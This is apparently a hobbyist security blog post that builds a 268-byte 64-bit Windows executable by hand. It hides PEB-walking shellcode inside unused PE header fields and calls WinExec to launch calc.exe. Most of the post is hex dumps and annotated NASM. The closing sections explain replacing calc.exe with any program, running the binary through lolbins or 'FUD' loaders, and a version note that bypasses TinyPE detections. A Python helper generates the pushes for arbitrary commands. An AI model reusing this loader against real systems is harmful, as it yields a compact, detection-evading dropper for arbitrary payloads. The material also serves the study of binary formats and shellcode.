Modern PE Mangling

I've been wanting to learn more about Windows exploits and shellcode techniques
for a bit, but a lot of the resources out there (as with Linux) are based on
32 bit versions of Windows, are very version specific, and simply don't work on
modern systems.

I decided to get started by learning more about PEs that run on 64 bit Windows.
I really don't know much about proper Windows API programming, so I wanted to
see the bare minimum required to load and run code on Windows.

WARNING: I am not a Windows expert, I am barely a Windows user, so please excuse
my noobishness and feel free to hit me up on twitter if you have any corrections
or extra info for this.

───[ Prior Work ]───────────────────────────────────────────────────────────────

Early attempts to create the smallest PE possible were based on 32 bit Windows
versions. Prior to this, you could create beautifully tiny COM files on DOS
using 16 bit assembly.

The first writeup I read was this one, which determined the following limits on
32 bit Windows versions.

- Smallest possible PE file: 97 bytes
- Smallest possible PE file on Windows 2000: 133 bytes
- Smallest PE file that downloads a file over WebDAV and executes it: 133 bytes

Unfortunately, the links to the files on this page are dead, so I could only
see what was listed on the page. The binary included in that writeup won't run
on modern Windows versions, so if we want to create a tiny binary to run on
Windows 10, we'll have to do some more research.

The consensus I found was that the lower limit for binary size on 64 bit
Windows versions was 268 bytes. Thanks to the excellent Corkami docs (PE101,
PE102), I was able to explore the format a bit more in depth. I located a few
POCs, and examined how the binaries that were generated were structured.

- Corkami PE POCs
- rcx/tinyPE

The header overlay technique that was established in the first writeup seems to
be employed by these POCs, but they don't overlay section headers.
The section headers define the .text segment as well as others, but it appears
that they aren't required for whatever reason.

───[ First Attempts ]───────────────────────────────────────────────────────────

I decided to keep the tradition of using NASM to write binaries by hand, because
it's easier to keep track of each byte individually and debug. My POC was based
on the rcx/tinyPE repo's smallest-pe.exe file. I created a list of all of the
headers and their sizes / locations to keep track of what was already there.

╭─ DOS Header ───────────────────╮
│ #  │ Sz │ Desc                 │
├────┼────┼──────────────────────┤
│ MA │ 2  │ e_magic              │
│ MB │ 2  │ e_cblp            ** │
│ MC │ 2  │ e_cp              ** │
│ MD │ 2  │ e_crlc            ** │
│ ME │ 2  │ e_cparhdr         ** │
│ MF │ 2  │ e_minalloc        ** │
│ MG │ 2  │ e_maxalloc        ** │
│ MH │ 2  │ e_ss              ** │
│ MI │ 2  │ e_sp              ** │
│ MJ │ 2  │ e_csum            ** │
│ MK │ 2  │ e_ip              ** │
│ ML │ 2  │ e_cs              ** │
│ MM │ 2  │ e_lfarlc          ** │
│ MN │ 2  │ e_ovno            ** │
│ MO │ 8  │ e_res             ** │
│ MP │ 2  │ e_oemid           ** │
│ MQ │ 2  │ e_oeminfo         ** │
│ MR │ 20 │ e_res2            ** │
│ MS │ 4  │ e_lfanew PE Sig Addr │
╰────────────────────────────────╯

╭─ PE Header ──────────────────────────────╮
│ #  │ Sz │ Desc                           │
├────┼────┼────────────────────────────────┤
│ PA │ 4  │ PE Signature                   │
│ PB │ 2  │ Machine (Intel 386)            │
│ PC │ 2  │ NumberOfSections               │
│ PD │ 4  │ TimeDateStamp               ** │
│ PE │ 4  │ PointerToSymbolTable        ** │
│ PF │ 4  │ NumberOfSymbols             ** │
│ PG │ 2  │ SizeOfOptionalHeader           │
│ PH │ 2  │ Characteristics (no relocs,    │
│    │    │ executable, 32 bit)            │
╰──────────────────────────────────────────╯

╭─ Optional Header ────────────────────────╮
│ #  │ Sz │ Desc                           │
├────┼────┼────────────────────────────────┤
│ OA │ 2  │ Magic (PE32)                   │
│ OB │ 1  │ MajorLinkerVersion          ** │
│ OC │ 1  │ MinorLinkerVersion          ** │
│ OD │ 4  │ SizeOfCode                  ** │
│ OE │ 4  │ SizeOfInitializedData       ** │
│ OF │ 4  │ SizeOfUninitializedData     ** │
│ OG │ 4  │ AddressOfEntryPoint            │
│ OH │ 4  │ BaseOfCode                  ** │
│ OI │ 4  │ BaseOfData                  ** │
│ OJ │ 4  │ ImageBase                      │
│ OK │ 4  │ SectionAlignment               │
│ OL │ 4  │ FileAlignment                  │
│ OM │ 2  │ MajorOperatingSystemVersion ** │
│ ON │ 2  │ MinorOperatingSystemVersion ** │
│ OO │ 2  │ MajorImageVersion           ** │
│ OP │ 2  │ MinorImageVersion           ** │
│ OQ │ 2  │ MajorSubsystemVersion          │
│ OR │ 2  │ MinorSubsystemVersion       ** │
│ OS │ 4  │ Win32VersionValue           ** │
│ OT │ 4  │ SizeOfImage                    │
│ OU │ 4  │ SizeOfHeaders                  │
│ OV │ 4  │ CheckSum                  ** * │
│ OW │ 2  │ Subsystem (Win32 GUI)          │
│ OX │ 2  │ DllCharacteristics          ** │
│ OY │ 4  │ SizeOfStackReserve          ** │
│ OZ │ 4  │ SizeOfStackCommit              │
│ O1 │ 4  │ SizeOfHeapReserve              │
│ O2 │ 4  │ SizeOfHeapCommit            ** │
│ O3 │ 4  │ LoaderFlags                 ** │
│ O4 │ 4  │ NumberOfRvaAndSizes         ** │
╰──────────────────────────────────────────╯

Anything marked with ** is unused. Some of these might have some expected value
ranges to respect, so keep that in mind when playing with them!

After I got it working, I needed a payload. I remembered the wonderful writeup
by Iliya Dafchev, "Writing Windows Shellcode", which details a more modern
approach to Windows shellcode. It parses the PEB structure to find the base
address of kernel32.dll, and then calls WinExec with arguments on the stack to
execute calc.exe.

As much as I love shellstorm, many of the payloads listed for Windows are based
on much older versions. Some of them use hardcoded addresses which aren't as
portable, so I figured it'd be a lot nicer to take an existing payload and pack
it into the binary.

The first step was loading the payload into the binary and seeing if it worked
as is. Fortunately, it did! I was able to just put the payload after the headers
at 0x7C and execute. Here is what that binary looks like.

$ xxd tiny304.exe
                    MC-- MD-- ME-- MF-- MG-- MH--
          MA-- MB-- PA------- PB-- PC-- PD-------
00000000: 4d5a 0000 5045 0000 4c01 0000 0000 0000  MZ..PE..L.......
          MI-- MJ-- MK-- ML-- MM-- MN-- MO-------
          PE------- PF------- PG-- PH-- OA-- OBOC
00000010: 0000 0000 0000 0000 6000 0301 0b01 0000  ........`.......
          MO------- MP-- MQ-- MR-----------------
          OD------- OE------- OF------- OG-------
00000020: 0300 0000 0000 0000 0000 0000 7c00 0000  ............|...
          MR--------------------------- MS-------
          OH------- OI------- OJ------- OK-------
00000030: 0000 0000 0000 0000 0000 4000 0400 0000  ..........@.....
          OL------- OM-- ON-- OO-- OP-- OQ-- OR--
00000040: 0400 0000 0000 0000 0000 0000 0500 0000  ................
          OS------- OT------- OU------- OV-------
00000050: 0000 0000 8000 0000 7c00 0000 0000 0000  ........|.......
          OW-- OX-- OY------- OZ------- O1-------
00000060: 0200 0004 0000 1000 0010 0000 0000 1000  ................
          O2------- O3------- O4------- CK-------
00000070: 0010 0000 0000 0000 0000 0000 31f6 83ec  ............1...
00000080: 1856 6a63 6668 7865 6857 696e 4589 65fc  .VjcfhxehWinE.e.
00000090: 648b 5e30 8b5b 0c8b 5b14 8b1b 8b1b 8b5b  d.^0.[..[......[
000000a0: 1089 5df8 8b43 3c01 d88b 4078 01d8 8b48  ..]..C<...@x...H
000000b0: 2401 d989 4df4 8b78 2001 df89 7df0 8b50  $...M..x ...}..P
000000c0: 1c01 da89 55ec 8b58 1431 c08b 55f8 8b7d  ....U..X.1..U..}
000000d0: f08b 75fc 31c9 fc8b 3c87 01d7 6683 c108  ..u.1...<...f...
000000e0: f3a6 740a 4039 d872 e583 c426 eb41 8b4d  ..t.@9.r...&.A.M
000000f0: f489 d38b 55ec 668b 0441 8b04 8201 d831  ....U.f..A.....1
00000100: d252 682e 6578 6568 6361 6c63 686d 3332  .Rh.exehcalchm32
00000110: 5c68 7973 7465 6877 735c 5368 696e 646f  \hystehws\Shindo
00000120: 6843 3a5c 5789 e66a 0a56 ffd0 83c4 46c3  hC:\W..j.V....F.

Being shellcode, the payload has some extra instructions to preserve and
restore registers, which help to clean up the execution if it were injected.
We can safely take out those instructions and continue. I did some other small
optimizations to reduce the code size, but other than that it's a pretty tight
payload.

───[ (Ab)using the Headers ]────────────────────────────────────────────────────

I had looked through some of the previous documentation on aspects of the header
that aren't used.
The headers are already overlaid, but within the overlay, there are still some
portions of the headers that are unused. These areas can be used to store data
or execute code without interfering with the binary's execution. The areas that
I used are listed here.

╭ Range ───── Len ─╮
│ 0x0C:0x18 │ 12   │
│ 0x1E:0x2C │ 14   │
│ 0x44:0x4C │ 8    │
│ 0x4E:0x54 │ 6    │
│ 0x5C:0x60 │ 4    │
│ 0x70:0x78 │ 8    │
╰──────────────────╯

When you jump around a header like this, you'll have to remember a couple of
things. First, for each cave in the header, unless you are ending the code
there, you must make sure you have enough room for your jumps to other areas.
I tend to allocate 2 bytes, because short jumps are generally the easiest to
work with, but you can use whatever you like as long as you keep the space they
take up in mind!

The other thing is that a short jump only reaches 127 bytes forward or 128
bytes back (counted from the end of the jump instruction). If you jump past
those bounds, the size of the instruction increases.

Something else I noticed was that NumberOfRvaAndSizes is touchy, and it possibly
prevents the binary from loading if you put something there. This and other
header areas are certainly open for experimentation!

Another trick of mine for ELF binary mangling was to put the code entrypoint in
the header itself. This is not as straightforward with PEs on 64 bit Windows.
Windows 8 established a restriction that the AddressOfEntryPoint can't be
smaller than SizeOfHeaders. The way around this is to set SizeOfHeaders to
AddressOfEntryPoint. More info here.

I didn't end up doing this trick, because the size of the binary was already
very small, and I wanted to fill up each part of it until the very end.

───[ Final Binary ]─────────────────────────────────────────────────────────────

So, armed with all of this information, this is the binary I ended up with.
BITS 32
;--- Smallest possible Win10 binary that execs calc.exe --------------------\\--
;
; Compile:
;   nasm -f bin -o tiny268_64.exe tiny268_64.asm
; Notice: You might get an error like "Cannot be started 0xc0000005",
;         this is fine, just run it again.
; Versions:
;   Bypass TinyPE detections                              Date: 20200330
;     Size: 268 bytes (SHA1) c935b155c6cdeacc495d7b695e71f0229e9ce5fc
;   First version at 268 bytes                            Date: 20200329
;     Size: 268 bytes (SHA1) 60e2c89d391052cc00145d277883e7feb6b67dd0
;   Original Version without optimization                 Date: 20200328
;     Size: 304 bytes (SHA1) bb59448a94acee171ea574e3a50dd6a2b75f4965
;
; Breakdown of Sections - Listed in comments of the header 0x00:0x7C
;
;                     MC-- MD-- ME-- MF-- MG-- MH--
;           MA-- MB-- PA------- PB-- PC-- PD-------
; 00000000: 4d5a 0001 5045 0000 4c01 0000 31f6 83ec  MZ..PE..L...1...
;           MI-- MJ-- MK-- ML-- MM-- MN-- MO-------
;           PE------- PF------- PG-- PH-- OA-- OBOC
; 00000010: 1856 6a63 9090 eb06 6000 0301 0b01 6668  .Vjc....`.....fh
;           MO------- MP-- MQ-- MR-----------------
;           OD------- OE------- OF------- OG-------
; 00000020: 7865 6857 696e 4589 65fc eb22 7c00 0000  xehWinE.e.."|...
;           MR--------------------------- MS-------
;           OH------- OI------- OJ------- OK-------
; 00000030: 0000 0000 0000 0000 0000 4000 0400 0000  ..........@.....
;           OL------- OM-- ON-- OO-- OP-- OQ-- OR--
; 00000040: 0400 0000 8b5b 0c8b 5b14 eb10 0500 648b  .....[..[.....d.
;           OS------- OT------- OU------- OV-------
; 00000050: 5e30 ebf0 8000 0000 7c00 0000 8b1b eb10  ^0......|.......
;           OW-- OX-- OY------- OZ------- O1-------
; 00000060: 0200 0004 0000 1000 0010 0000 0000 1000  ................
;           O2------- O3------- O4------- CK-------
; 00000070: 8b1b 8b5b 10eb 07c3 0000 0000 eb8e 895d  ...[...........]
; 00000080: f88b 433c 01d8 8b40 7801 d88b 4824 01d9  ..C<...@x...H$..
; [...]
;   --> 0x0C PEB_LDR_DATA
;     --> 0x14 InMemoryOrderModuleList
;       --> 0x00 ntdll.dll entry address
;         --> 0x00 kernel32.dll list entry address
;           --> 0x10 kernel32.dll base address !!
; Note that most of this is done in the header, see jump2 - jump5
; PEB Parser Part 5 ------------------------------------------------------------
  mov [ebp-0x8], ebx        ; 895df8     ; kernel32.dll base address

;--- Finding WinExec address
; This section weaves its way through the headers of kernel32.dll.
; Based on a non-fucky PE like this one, we can sort of rely on certain things
; being where we expect them.
; First, the Relative Virtual Address of the PE signature is loaded from ebx.
; EAX then becomes the address that we're calculating from.
;
; The addresses of our structures are calculated using the base address of the
; PE signature in EAX + its offset within that structure, and then added to the
; base address stored in EBX. These are then moved to the stack.
;
  mov eax,dword [ebx+0x3c]  ; 8b433c     ; RVA of PE signature
  add eax,ebx               ; 01d8       ; PE sig addr = base addr + RVA of PE sig
  mov eax,dword [eax+0x78]  ; 8b4078     ; RVA of Export Table
  add eax,ebx               ; 01d8       ; Address of Export Table
  mov ecx,dword [eax+0x24]  ; 8b4824     ; RVA of Ordinal Table
  add ecx,ebx               ; 01d9       ; Address of Ordinal Table
  mov dword [ebp-0xc],ecx   ; 894df4     ; Put on the stack
  mov edi,dword [eax+0x20]  ; 8b7820     ; RVA of Name Pointer Table
  add edi,ebx               ; 01df       ; Address of Name Pointer Table
  mov dword [ebp-0x10],edi  ; 897df0     ; Put on the stack
  mov edx,dword [eax+0x1c]  ; 8b501c     ; RVA of Address Table
  add edx,ebx               ; 01da       ; Address of Address Table
  mov dword [ebp-0x14],edx  ; 8955ec     ; Put on the stack
  mov ebx,dword [eax+0x14]  ; 8b5814     ; Number of exported functions

;--- Using the Name Pointer Table
; This part loops through the Name Pointer Table and compares entries to what
; we're looking for: "WinExec".
; The number of entries is counted using EAX, and once the WinExec entry is
; found, the entry in the ordinal table is found using the count. See 'locate'
  xor eax,eax               ; 31c0       ; EAX will be our entry counter
  mov edx, dword [ebp - 8]  ; 8b55f8     ; EDX = kernel32.dll base address
loopy:
  mov edi,dword [ebp-0x10]  ; 8b7df0     ; edi = Address of Name Pointer Table
  mov esi,dword [ebp-4]     ; 8b75fc     ; esi = "WinExec\x00"
  xor ecx,ecx               ; 31c9       ; ECX = 0
  cld                       ; fc         ; Clear direction flag
                                         ; Strings now go left->right
  mov edi,dword [edi+eax*4] ; 8b3c87     ; Name Pointer Table entries are 4 bytes,
                                         ; edi (NPT addr) + eax (num entries) * 4
  add edi,edx               ; 01d7       ; EDI = name RVA + kernel32.dll base addr
  add cx,0x8                ; 6683c108   ; Length of "WinExec\x00"
  repe cmpsb                ; f3a6       ; Compare the first 8 bytes in esi and edi
  jz locate                 ; 740a       ; Jump if there's a match.
  inc eax                   ; 40         ; Increment entry counter
  cmp eax,ebx               ; 39d8       ; Check if the last function was reached
  jb loopy                  ; 72e5       ; If not the last one, continue
  add esp,0x26              ; 83c426     ; Move stack away from our mess
  jmp endy                  ; eb41       ; If nothing found, return

;--- Executing our function
; Once we're here, we know the position of WinExec within the ordinal table
; of kernel32.dll, so now all that's left is to call the function.
; We use all of our saved addresses on the stack for this.
locate:
  mov ecx, [ebp-0xc]        ; 8b4df4     ; ECX = Address of Ordinal Table
  mov ebx, edx              ; 89d3       ; EBX = kernel32.dll base address
  mov edx, [ebp-0x14]       ; 8b55ec     ; EDX = Address of Address Table
  mov ax, [ecx+eax*2]       ; 668b0441   ; AX = [ordinal table addr + (entry num * 2)]
  mov eax, [edx+eax*4]      ; 8b0482     ; EAX = [addr table addr + (ordinal * 4)]
  add eax,ebx               ; 01d8       ; EAX = WinExec Addr =
                                         ; = kernel32.dll base address + RVA of WinExec
  xor edx,edx               ; 31d2       ; We need a 0...
  push edx                  ; 52         ; ...for the end of our string
  push 0x6578652e           ; 682e657865 ; ".exe"
  push 0x636c6163           ; 6863616c63 ; "calc"
  push 0x5c32336d           ; 686d33325c ; "m32\"
  push 0x65747379           ; 6879737465 ; "yste"
  push 0x535c7377           ; 6877735c53 ; "ws\S"
  push 0x6f646e69           ; 68696e646f ; "indo"
  push 0x575c3a43           ; 68433a5c57 ; "C:\W"
  mov esi,esp               ; 89e6       ; ESI="C:\Windows\System32\calc.exe"
  push 0xa                  ; 6a0a       ; window state SW_SHOWDEFAULT
  push esi                  ; 56         ; "C:\Windows\System32\calc.exe"
  call eax                  ; ffd0       ; WinExec
  add esp,0x46              ; 83c446     ; Clear the stack

The binary starts with a short jump back into the headers, and then leaps around
to set up the "WinExec" string on the stack and begin to parse the PEB, before
jumping back to the main code section and continuing execution there. If WinExec
isn't found, it returns back into the headers to execute the final ret
instruction.

The payload ends kind of abruptly. You could simply not include the last
instruction after 'call eax', but I didn't have anything else to put there so I
just left it to keep the size.

───[ What do I use this for? ]──────────────────────────────────────────────────

You can modify the last portion of code under the 'locate' label to push the
path of whatever program you want to execute onto the stack in place of
"C:\Windows\System32\calc.exe". You'll have to make sure you allocate enough
stack space for yourself and place arguments in the right place if they are
required.

You can use powershell or some lolbins or whatever elite FUD 100% battle tested
"plz don't upload to VT or ur ded!!" binary loader to execute a base64 encoded
version of this binary.

- Check out my other small binaries on GitHub!
- Download the POC binary here.
- Payload generator for WinExec method

───[ Shoutouts ]────────────────────────────────────────────────────────────────

Thanks to dnz, readme, xehle, secfarmer, remy, Ange Albertini, Iliya Dafchev,
and everyone in the Binary Analysis and Exploit Dev chans I dump crap into.
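
One more note on swapping the command in the 'locate' block: the string is
pushed in 4 byte chunks, last chunk first, and each "push imm32" is just 0x68
followed by the raw chunk bytes. Below is a rough Python sketch of how those
pushes could be generated for another command. The helper name push_string is
made up for this example and this is not the payload generator linked above. It
assumes an ASCII command and pads it with NUL bytes up to a multiple of 4.

```python
def push_string(cmd: str) -> list[tuple[bytes, str]]:
    """Return (machine code, NASM text) pairs that push cmd onto the stack.

    Hypothetical helper for illustration only. Assumes 32 bit code and an
    ASCII command. The string is padded with NUL bytes to a multiple of 4.
    """
    data = cmd.encode("ascii")
    data += b"\x00" * (-len(data) % 4)

    pushes = []
    # The stack grows down, so the last 4 bytes of the string go first.
    for i in range(len(data) - 4, -1, -4):
        chunk = data[i:i + 4]
        value = int.from_bytes(chunk, "little")
        # push imm32 is opcode 0x68 followed by the little-endian immediate,
        # which is the same byte order as the chunk itself.
        pushes.append((b"\x68" + chunk, f"push 0x{value:08x}"))
    return pushes


if __name__ == "__main__":
    for code, text in push_string("C:\\Windows\\System32\\calc.exe"):
        print(f"  {text:<26}; {code.hex()}")
```

For the calc.exe path this gives the same seven pushes as the listing. It only
covers the string itself: the 'push edx' terminator stays in front when the
length is already a multiple of 4, and the 'add esp' cleanup and the total size
of the binary will probably need adjusting for a longer or shorter command.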